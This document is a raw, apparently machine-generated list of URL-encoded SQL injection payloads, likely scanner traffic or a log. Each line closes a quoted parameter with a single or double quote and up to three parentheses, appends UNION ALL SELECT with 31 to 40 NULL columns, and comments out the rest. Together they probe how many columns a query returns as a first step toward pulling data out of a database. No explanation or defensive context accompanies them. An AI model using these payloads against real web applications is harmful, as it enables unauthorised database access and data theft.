foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 